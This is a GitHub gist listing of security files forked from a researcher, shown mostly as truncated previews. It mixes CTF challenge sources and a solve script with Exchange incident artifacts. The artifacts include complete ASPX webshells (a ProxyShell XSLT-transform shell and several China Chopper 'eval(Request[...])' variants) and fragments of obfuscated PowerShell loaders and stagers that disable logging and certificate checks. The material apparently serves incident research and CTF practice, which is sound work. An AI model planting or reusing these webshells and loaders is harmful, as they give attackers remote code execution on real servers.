tehmasta
/ auto_file_download.html
Created
January 6, 2023 17:07
— forked from JohnHammond/auto_file_download.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Please Subscribe</title> | |
| </head> | |
| <body> | |
| <script> | |
| // File name and contents |
tehmasta
/ notegen.py
Created
January 6, 2023 18:25
— forked from LapisOnTheMoon/notegen.py
Generates a README.md with TryHackMe tasks and questions automatically.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import requests | |
| import sys | |
| from datetime import datetime | |
| import re | |
| tag_re = re.compile(r'(<!--.*?-->|<[^>]*>)') | |
| name = "" # change this | |
| code = "" | |
| def get_room_code(s): |
tehmasta
/ proxyshell_xsl_transform.cs
Created
January 6, 2023 18:27
— forked from JohnHammond/proxyshell_xsl_transform.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %><% var c=new System.Xml.XmlDocument();c.LoadXml(@"<root>1</root>");var b=new System.Xml.XmlDocument();b.LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request["REDACTED"])));var xct=new System.Xml.Xsl.XslCompiledTransform();xct.Load(b,System.Xml.Xsl.XsltSettings.TrustedXslt,new System.Xml.XmlUrlResolver());xct.Transform(c,null,new System.IO.MemoryStream()); %> |
tehmasta
/ powershell_gunpowder.ps1
Created
January 6, 2023 18:29
— forked from JohnHammond/powershell_gunpowder.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sOH { | |
| Param ($o73, $icO) | |
| $zJ3 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| return $zJ3.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zJ3.GetMethod('GetModuleHandle')).Invoke($null, @($o73)))), $icO)) | |
| } |
tehmasta
/ source.py
Created
January 6, 2023 18:40
— forked from JohnHammond/source.py
Codefest CTF 2018 "Ghost Protocol" Source Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########################################################## | |
| ########################################################## | |
| ####### ###### # ##### | |
| # # # # # | |
| # ### # ##### | |
| # # # # # | |
| ##### # # ##### | |
| ########################################################## | |
| ########################################################## |
tehmasta
/ source.py
Created
January 6, 2023 18:40
— forked from JohnHammond/source.py
Codefest CTF 2018 "Access Denied?" Challenge Source
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import random | |
| import user_functions | |
| user = raw_input("Enter your name: ") | |
| if not user_functions.exists(user): | |
| # generate a code |
tehmasta
/ get_flag.py
Created
January 6, 2023 18:41
— forked from JohnHammond/get_flag.py
Codefest CTF 2018 "Access Denied?" get_flag Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import random | |
| from pwn import * | |
| context.log_level = 'critical' | |
| # nc 34.216.132.109 9094 | |
| host = '34.216.132.109' |
tehmasta
/ p.estonine.com_stager02.ps1
Created
January 6, 2023 18:52
— forked from JohnHammond/p.estonine.com_stager02.ps1
Microsoft Exchange Post-Exploitation Artifacts 02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC) | |
| try{ | |
| $name = 'Global\PSEXEC' | |
| $exeflag = $flase | |
| New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag) | |
| }catch{} | |
| | |
| $dt = Get-Date -Format 'yyMMdd' | |
| $path = "$env:temp\\ccc.log" | |
| [string]$flag = test-path $path |
tehmasta
/ china_chopper_source.csv
Created
January 6, 2023 18:52
— forked from JohnHammond/china_chopper_source.csv
Microsoft Exchange Incident "China Chopper" ASPX Webshell source
We can make this file beautiful and searchable if this error is corrected: Illegal quoting in line 2.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Occurrences, WebShell Source | |
| 190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script> | |
| 50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
| 11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
| 7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script> | |
| 5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script> | |
| 1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2 |
tehmasta
/ dns_pulldown.ps1
Created
January 6, 2023 18:52
— forked from JohnHammond/dns_pulldown.ps1
DNS Pulldown
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0..4|%{try | |
| { | |
| $LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False; | |
| $u=[System.Text.Encoding]::UTF8; | |
| sAl er Get-Random; | |
| $l=[System.Net.WebRequest]; | |
| sAL no New-Object; | |
| $g=[SysTEm.Net.SeRvICePoIntMAnaGEr]; | |
| $g::Expect100ConTINuE=0; | |
| $g::ServerCertificateValidationCallback={1}; |
OlderNewer